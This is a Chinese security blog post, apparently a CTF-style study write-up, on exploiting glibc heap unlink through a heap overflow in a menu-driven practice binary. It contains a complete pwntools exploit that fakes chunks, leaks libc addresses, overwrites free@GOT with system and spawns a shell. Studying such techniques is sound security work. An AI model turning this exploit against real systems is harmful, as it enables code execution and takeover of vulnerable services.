<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>heap vuln -- unlink | o0xmuhe&#39;s blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="0x00:起因一直在堆的漏洞利用中不得要领，之前ZCTF又是三个堆的利用，血崩，chxx表哥给写了一个heap的pwn，学习学习。">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="heap vuln -- unlink">
<meta property="og:url" content="http:&#x2F;&#x2F;o0xmuhe.me&#x2F;2016&#x2F;02&#x2F;15&#x2F;heap-vuln-unlink&#x2F;index.html">
<meta property="og:site_name" content="o0xmuhe&#39;s blog">
<meta property="og:description" content="0x00:起因一直在堆的漏洞利用中不得要领，之前ZCTF又是三个堆的利用，血崩，chxx表哥给写了一个heap的pwn，学习学习。">
<meta property="og:locale" content="default">
<meta property="og:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;heap_unlink&#x2F;o_info.png">
<meta property="og:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;heap_unlink&#x2F;t_sec_check.png">
<meta property="og:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;heap_unlink&#x2F;o_vuln.png">
<meta property="og:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;heap_unlink&#x2F;o_getshell.png">
<meta property="og:updated_time" content="2016-10-06T07:27:28.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;heap_unlink&#x2F;o_info.png">
  
    <link rel="alternative" href="/atom.xml" title="o0xmuhe&#39;s blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/head.jpg" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate">muhe</a></h1>
        </hgroup>

        
        <p class="header-subtitle">control $pc, control the world</p>
        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">博客首页</a></li>
                        
                            <li><a href="/archives">所有文章</a></li>
                        
                            <li><a href="/frinds">友情链接</a></li>
                        
                            <li><a href="/about">关于我</a></li>
                        
                            <li><a href="/Pwnable-Log">Pwnable</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github" target="_blank" href="https://github.com/o0xmuhe" title="github">github</a>
                            
                                <a class="fl weibo" target="_blank" href="http://weibo.com/2070174943/" title="weibo">weibo</a>
                            
                                <a class="fl twitter" target="_blank" href="https://twitter.com/0xmuhe" title="twitter">twitter</a>
                            
                                <a class="fl rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/1day/" style="font-size: 10px;">1day</a> <a href="/tags/Adobe/" style="font-size: 11.43px;">Adobe</a> <a href="/tags/Adobe-Acrobat-Reader/" style="font-size: 10px;">Adobe Acrobat Reader</a> <a href="/tags/Adobe-Reader/" style="font-size: 11.43px;">Adobe Reader</a> <a href="/tags/Antlr/" style="font-size: 10px;">Antlr</a> <a href="/tags/Apple/" style="font-size: 10px;">Apple</a> <a href="/tags/Bindiff/" style="font-size: 10px;">Bindiff</a> <a href="/tags/C/" style="font-size: 11.43px;">C</a> <a href="/tags/CTF/" style="font-size: 10px;">CTF</a> <a href="/tags/CTF-Writeup/" style="font-size: 10px;">CTF Writeup</a> <a href="/tags/CVE/" style="font-size: 10px;">CVE</a> <a href="/tags/Compilers/" style="font-size: 10px;">Compilers</a> <a href="/tags/ESXi/" style="font-size: 10px;">ESXi</a> <a href="/tags/Frida/" style="font-size: 10px;">Frida</a> <a href="/tags/IDA/" style="font-size: 12.86px;">IDA</a> <a href="/tags/IPC/" style="font-size: 11.43px;">IPC</a> <a href="/tags/LLVM/" style="font-size: 10px;">LLVM</a> <a href="/tags/Linux/" style="font-size: 12.86px;">Linux</a> <a href="/tags/MacOS/" style="font-size: 11.43px;">MacOS</a> <a href="/tags/Mach/" style="font-size: 10px;">Mach</a> <a href="/tags/PANDA/" style="font-size: 10px;">PANDA</a> <a href="/tags/PoC/" style="font-size: 11.43px;">PoC</a> <a href="/tags/Python/" style="font-size: 10px;">Python</a> <a href="/tags/RE/" style="font-size: 10px;">RE</a> <a href="/tags/Snell/" style="font-size: 10px;">Snell</a> <a href="/tags/Study/" style="font-size: 15.71px;">Study</a> <a href="/tags/Surge/" style="font-size: 10px;">Surge</a> <a href="/tags/Symbolic-Execution/" style="font-size: 10px;">Symbolic Execution</a> <a href="/tags/Tools/" style="font-size: 11.43px;">Tools</a> <a href="/tags/UaF/" style="font-size: 10px;">UaF</a> <a href="/tags/Webkit/" style="font-size: 10px;">Webkit</a> <a href="/tags/android/" style="font-size: 10px;">android</a> <a href="/tags/angr/" style="font-size: 11.43px;">angr</a> <a href="/tags/compiler/" style="font-size: 10px;">compiler</a> <a href="/tags/ctf/" style="font-size: 18.57px;">ctf</a> <a href="/tags/ctf-writeup/" style="font-size: 20px;">ctf writeup</a> <a href="/tags/debug/" style="font-size: 10px;">debug</a> <a href="/tags/env-config/" style="font-size: 10px;">env config</a> <a href="/tags/exploit/" style="font-size: 15.71px;">exploit</a> <a href="/tags/frida/" style="font-size: 10px;">frida</a> <a href="/tags/fuzz/" style="font-size: 14.29px;">fuzz</a> <a href="/tags/gdb/" style="font-size: 10px;">gdb</a> <a href="/tags/glibc%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86/" style="font-size: 10px;">glibc内存管理</a> <a href="/tags/life/" style="font-size: 11.43px;">life</a> <a href="/tags/linux/" style="font-size: 10px;">linux</a> <a href="/tags/linux-kernel/" style="font-size: 12.86px;">linux kernel</a> <a href="/tags/macOS/" style="font-size: 17.14px;">macOS</a> <a href="/tags/mips/" style="font-size: 10px;">mips</a> <a href="/tags/paper/" style="font-size: 10px;">paper</a> <a href="/tags/peach/" style="font-size: 10px;">peach</a> <a href="/tags/pwn/" style="font-size: 15.71px;">pwn</a> <a href="/tags/python/" style="font-size: 10px;">python</a> <a href="/tags/ret-2-dl-resolve/" style="font-size: 10px;">ret 2 dl-resolve</a> <a href="/tags/study/" style="font-size: 12.86px;">study</a> <a href="/tags/tools/" style="font-size: 10px;">tools</a> <a href="/tags/uaf/" style="font-size: 10px;">uaf</a> <a href="/tags/unicorn-engine/" style="font-size: 10px;">unicorn engine</a> <a href="/tags/vuln-analysis/" style="font-size: 10px;">vuln analysis</a> <a href="/tags/wargame/" style="font-size: 11.43px;">wargame</a> <a href="/tags/webkit/" style="font-size: 12.86px;">webkit</a> <a href="/tags/winafl/" style="font-size: 10px;">winafl</a> <a href="/tags/windows-kernel/" style="font-size: 12.86px;">windows kernel</a> <a href="/tags/writeup/" style="font-size: 10px;">writeup</a> <a href="/tags/%E5%85%B6%E4%BB%96/" style="font-size: 10px;">其他</a> <a href="/tags/%E5%B7%A5%E5%85%B7/" style="font-size: 10px;">工具</a> <a href="/tags/%E6%84%9F%E6%82%9F/" style="font-size: 10px;">感悟</a> <a href="/tags/%E6%84%9F%E6%83%B3/" style="font-size: 10px;">感想</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" style="font-size: 15.71px;">漏洞分析</a> <a href="/tags/%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" style="font-size: 11.43px;">环境配置</a> <a href="/tags/%E7%BC%96%E8%AF%91%E5%8E%9F%E7%90%86/" style="font-size: 11.43px;">编译原理</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://syclover.sinaapp.com/">Syclover Team</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://weibo.com/u/5376172367">最爱的高老师</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.Ox9A82.com">0x9A82学弟</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://k1n9.me/">K1n9师傅</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.cnblogs.com/iamstudy">L3mon</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.xianyusec.com">咸鱼</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://rootclay.com">rootclay</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://v1ct0r.com/">V1ct0r</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://godot.win">Godot学弟</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://hebic.me/">Homaebic学弟</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://iqwq.me">两米的sco4x0</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://zmy.im/">JimmyZhou</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://silic.top/">灭亡叔叔</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://dwx.io">Jason</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="	http://www.0aa.me/">Mosuan</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://whereisk0shl.top">k0sh1</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://winter3un.github.io">WinterSun</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://venenof.com">Venenof</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://r0p.me/">Icemakr</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://bestwing.me/">Swing</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://www.hackfun.org/">4ido10n</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.hackersb.cn/">王松_Striker</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.cnblogs.com/7top/">7top</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.bendawang.site">bendawang</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://yixuankeer.win">前端joker大佬</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://blog.lc4t.me">lc4t</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.inksec.cn/">Szrzvdny</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://sixwha1e.github.io/">漂亮的sixwhale小姐姐</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://ctfrank.org">CTF Rank</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://askook.me/">A酱</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="/idoge.cc">重庆五套房的小葱</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="/stone.moe">石头</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="/pi4net.com">邢老师最优秀</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">二进制安全. Member of Syclover. CTFer/INTJ.</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me">muhe</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/head.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me">muhe</a></h1>
            </hgroup>
            
            <p class="header-subtitle">control $pc, control the world</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">博客首页</a></li>
                
                    <li><a href="/archives">所有文章</a></li>
                
                    <li><a href="/frinds">友情链接</a></li>
                
                    <li><a href="/about">关于我</a></li>
                
                    <li><a href="/Pwnable-Log">Pwnable</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="https://github.com/o0xmuhe" title="github">github</a>
                    
                        <a class="weibo" target="_blank" href="http://weibo.com/2070174943/" title="weibo">weibo</a>
                    
                        <a class="twitter" target="_blank" href="https://twitter.com/0xmuhe" title="twitter">twitter</a>
                    
                        <a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-heap-vuln-unlink" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2016/02/15/heap-vuln-unlink/" class="article-date">
      <time datetime="2016-02-15T07:21:48.000Z" itemprop="datePublished">2016-02-15</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      heap vuln -- unlink
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h4 id="0x00-起因"><a href="#0x00-起因" class="headerlink" title="0x00:起因"></a>0x00:起因</h4><p>一直在堆的漏洞利用中不得要领，之前ZCTF又是三个堆的利用，血崩，chxx表哥给写了一个heap的pwn，学习学习。</p>
<a id="more"></a>
<h4 id="0x01"><a href="#0x01" class="headerlink" title="0x01:"></a>0x01:</h4><p>关于heap的unlink的漏洞利用，出的很早，在低版本的libc中，因为没有校验，导致在unlink的时候可以通过构造堆块dwordshoot，从而任意代码执行。<br>对于这种漏洞的学习，首先要了解malloc的工作原理及几种堆块的分配、使用方式。推荐文章 <a href="https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/comment-page-1/" target="_blank" rel="noopener">Understanding glibc malloc</a></p>
<h4 id="0x02-文件信息"><a href="#0x02-文件信息" class="headerlink" title="0x02:文件信息"></a>0x02:文件信息</h4><p><img src="http://blogimg-10065924.cos.myqcloud.com/heap_unlink/o_info.png" alt=""></p>
<p><img src="http://blogimg-10065924.cos.myqcloud.com/heap_unlink/t_sec_check.png" alt=""></p>
<h4 id="0x03-分析"><a href="#0x03-分析" class="headerlink" title="0x03:分析"></a>0x03:分析</h4><p>程序是一个菜单式的程序，可以用户自定义分配块的长度和内容，漏洞在于：edit的时候，没做长度校验导致可以溢出，通过构造可以bypass 在libc中unlink的校验，从而getshell。<br><img src="http://blogimg-10065924.cos.myqcloud.com/heap_unlink/o_vuln.png" alt=""></p>
<h4 id="0x04-在drops看到的姿势"><a href="#0x04-在drops看到的姿势" class="headerlink" title="0x04:在drops看到的姿势"></a>0x04:在drops看到的姿势</h4><p><a href="http://drops.wooyun.org/tips/7326" target="_blank" rel="noopener">堆溢出的unlink利用方法</a><br>按照文中给出的方式，为了bypass</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (__builtin_expect (FD-&gt;bk != P || BK-&gt;fd != P, <span class="number">0</span>))</span><br><span class="line">4malloc_printerr (check_action, <span class="string">"corrupted double-linked list"</span>, P);</span><br></pre></td></tr></table></figure>
<p>这么一个指针的校验，我们找到一个特殊的 指针ptr是指向p的(p指向堆)<br>那么可以根据p去构造bk和fd两个指针</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">chunk0                malloc返回的ptr           chunk1        malloc返回的ptr</span><br><span class="line">|                     |                        |             |</span><br><span class="line">+-----------+---------+----+----+----+----+----+------+------+----+----+------+</span><br><span class="line">|           |         |fake|fake|fake|fake| D  | fake | fake |    |    |      |</span><br><span class="line">|           |         |prev|size| FD | BK | A  | prev | size&amp;|    |    |      |</span><br><span class="line">| prev_size |size&amp;Flag|size|    |    |    | T  | size | flag |    |    |      |</span><br><span class="line">|           |         |    |    |    |    | A  |      |      |    |    |      |</span><br><span class="line">|           |         |    |    |    |    |    |      |      |    |    |      |</span><br><span class="line">+-----------+---------+----+----+----+----+----+------+------+----+----+------+</span><br><span class="line">                      |--------new_size--------|</span><br><span class="line">                      list</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">l32(<span class="number">0</span>)  +  l32(<span class="number">0x89</span>)  +  l32(list<span class="number">-0xc</span>) + l32(list<span class="number">-0x8</span>) +<span class="string">"A"</span>*(<span class="number">128</span><span class="number">-4</span>*<span class="number">4</span>)</span><br><span class="line"><span class="comment">#fake_pre_szie + fake_size + fake_FD + fake_BK + DATA</span></span><br><span class="line"><span class="comment">#   4bytes        4bytes     4bytes    4bytes    128-4*4</span></span><br><span class="line"><span class="comment">#pre_size   +   size&amp;flag</span></span><br><span class="line">l32(<span class="number">0x80</span>) + l32(<span class="number">0x88</span>)</span><br><span class="line">free(chunk_1)</span><br></pre></td></tr></table></figure>
<p>分配两个长度合适的块，伪造第一个块，然后通过修改了第二个块的pre_size 和size<br>然后free(chunk1) 触发unlink</p>
<p>之后再次修改指针p 从而达到leak地址，修改地址的目的</p>
<h4 id="0x05-exp"><a href="#0x05-exp" class="headerlink" title="0x05:exp"></a>0x05:exp</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.update(os=<span class="string">'linux'</span>, arch=<span class="string">'i386'</span>)</span><br><span class="line">p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">10001</span>)</span><br><span class="line">chunk_list = <span class="number">0x8049d60</span></span><br><span class="line">free_got = <span class="number">0x8049ce8</span></span><br><span class="line">flag = <span class="number">0</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak</span><span class="params">(addr)</span>:</span></span><br><span class="line">    data = <span class="string">"A"</span> * <span class="number">0xc</span> + p32(chunk_list<span class="number">-0xc</span>) + p32(addr)</span><br><span class="line">    <span class="keyword">global</span> flag</span><br><span class="line">    <span class="keyword">if</span> flag == <span class="number">0</span>:</span><br><span class="line">        set_chunk(<span class="number">0</span>, data)</span><br><span class="line">        flag = <span class="number">1</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        set_chunk2(<span class="number">0</span>, data)</span><br><span class="line">    res = <span class="string">""</span></span><br><span class="line">    p.recvuntil(<span class="string">'5.Exit\n'</span>)</span><br><span class="line">    res = print_chunk(<span class="number">1</span>)</span><br><span class="line">    print(<span class="string">"leaking: %#x ---&gt; %s"</span> % (addr, res[<span class="number">0</span>:<span class="number">4</span>].encode(<span class="string">'hex'</span>)))</span><br><span class="line">    <span class="keyword">return</span> res[<span class="number">0</span>:<span class="number">4</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add_chunk</span><span class="params">(len)</span>:</span></span><br><span class="line">4<span class="keyword">print</span> p.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line">4p.sendline(<span class="string">'1'</span>)</span><br><span class="line">4<span class="keyword">print</span> p.recvuntil(<span class="string">'Input the size of chunk you want to add:'</span>)</span><br><span class="line">4p.sendline(str(len))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">set_chunk</span><span class="params">(index,data)</span>:</span></span><br><span class="line">4p.recvuntil(<span class="string">'5.Exit\n'</span>)</span><br><span class="line">4p.sendline(<span class="string">'2'</span>)</span><br><span class="line">4p.recvuntil(<span class="string">'Set chunk index:'</span>)</span><br><span class="line">4p.sendline(str(index))</span><br><span class="line">4p.recvuntil(<span class="string">'Set chunk data:'</span>)</span><br><span class="line">4p.sendline(data)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">set_chunk2</span><span class="params">(index, data)</span>:</span></span><br><span class="line">    p.sendline(<span class="string">'2'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'Set chunk index:'</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line">    p.recvuntil(<span class="string">'Set chunk data:'</span>)</span><br><span class="line">    p.sendline(data)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">del_chunk</span><span class="params">(index)</span>:</span></span><br><span class="line">4p.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line">4p.sendline(<span class="string">'3'</span>)</span><br><span class="line">4p.recvuntil(<span class="string">'Delete chunk index:'</span>)</span><br><span class="line">4p.sendline(str(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">print_chunk</span><span class="params">(index)</span>:</span></span><br><span class="line">4p.sendline(<span class="string">'4'</span>)</span><br><span class="line">4p.recvuntil(<span class="string">'Print chunk index:'</span>)</span><br><span class="line">4p.sendline(str(index))</span><br><span class="line">4res = p.recvuntil(<span class="string">'5.Exit\n'</span>)</span><br><span class="line">4<span class="keyword">return</span> res</span><br><span class="line">raw_input(<span class="string">'add_chunk'</span>)</span><br><span class="line">add_chunk(<span class="number">128</span>)  <span class="comment">#0</span></span><br><span class="line">add_chunk(<span class="number">128</span>)	<span class="comment">#1</span></span><br><span class="line">add_chunk(<span class="number">128</span>)	<span class="comment">#2</span></span><br><span class="line">add_chunk(<span class="number">128</span>)	<span class="comment">#3</span></span><br><span class="line">set_chunk(<span class="number">3</span>, <span class="string">'/bin/sh'</span>)</span><br><span class="line"><span class="comment">#fake_chunk</span></span><br><span class="line">payload = <span class="string">""</span></span><br><span class="line">payload += p32(<span class="number">0</span>) + p32(<span class="number">0x89</span>) + p32(chunk_list<span class="number">-0xc</span>) + p32(chunk_list<span class="number">-0x8</span>)</span><br><span class="line">payload += <span class="string">"A"</span>*(<span class="number">0x80</span><span class="number">-4</span>*<span class="number">4</span>)</span><br><span class="line"><span class="comment">#2nd chunk </span></span><br><span class="line">payload += p32(<span class="number">0x80</span>) + p32(<span class="number">0x88</span>)</span><br><span class="line">set_chunk(<span class="number">0</span>,payload)</span><br><span class="line"><span class="comment">#get the pointer</span></span><br><span class="line">del_chunk(<span class="number">1</span>)</span><br><span class="line">set_chunk(<span class="number">0</span>, <span class="string">'A'</span> * <span class="number">12</span> + p32(<span class="number">0x8049d54</span>) + p32(<span class="number">0x8049d14</span>))</span><br><span class="line">raw_input(<span class="string">'leak'</span>)</span><br><span class="line"><span class="comment">#leak system_addr</span></span><br><span class="line">pwn_elf = ELF(<span class="string">'./heap'</span>)</span><br><span class="line">d = DynELF(leak, elf=pwn_elf)</span><br><span class="line">sys_addr = d.lookup(<span class="string">'system'</span>, <span class="string">'libc'</span>)</span><br><span class="line">print(<span class="string">"system addr: %#x"</span> % sys_addr)</span><br><span class="line">raw_input(<span class="string">'edit free@got'</span>)</span><br><span class="line">data = <span class="string">"A"</span> * <span class="number">12</span> + p32(chunk_list<span class="number">-0xc</span>) + p32(free_got)</span><br><span class="line">set_chunk2(<span class="string">'0'</span>, data)</span><br><span class="line">set_chunk2(<span class="string">'1'</span>, p32(sys_addr))</span><br><span class="line">del_chunk(<span class="string">'3'</span>)</span><br><span class="line">p.interactive()</span><br><span class="line">p.close()</span><br></pre></td></tr></table></figure>
<p><img src="http://blogimg-10065924.cos.myqcloud.com/heap_unlink/o_getshell.png" alt=""></p>
<h4 id="0x06-参考"><a href="#0x06-参考" class="headerlink" title="0x06:参考"></a>0x06:参考</h4><ol>
<li><a href="https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/comment-page-1/" target="_blank" rel="noopener">Understanding glibc malloc</a></li>
<li><a href="http://drops.wooyun.org/tips/7326" target="_blank" rel="noopener">堆溢出的unlink利用方法</a></li>
</ol>
<ul>
<li>最后还要感谢chxx大表哥的pwn和指导=。=</li>
<li>所有文件都在这里了 <a href="https://github.com/o0xmuhe/heap_pwn_study" target="_blank" rel="noopener">文件下载</a></li>
</ul>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2016/02/15/heap-vuln-unlink/">heap vuln -- unlink</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 muhe 的个人博客">muhe</a></p>
        <p><span>发布时间:</span>2016年02月15日 - 15时21分</p>
        <p><span>最后更新:</span>2016年10月06日 - 15时27分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2016/02/15/heap-vuln-unlink/" title="heap vuln -- unlink">http://o0xmuhe.me/2016/02/15/heap-vuln-unlink/</a>
            <span class="copy-path" data-clipboard-text="原文: http://o0xmuhe.me/2016/02/15/heap-vuln-unlink/　　作者: muhe" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" target="_blank" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2016/04/30/cctf-pwn350/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          cctf pwn350
        
      </div>
    </a>
  
  
    <a href="/2015/12/02/format-string-with-stack-frame/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">format string with stack frame</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
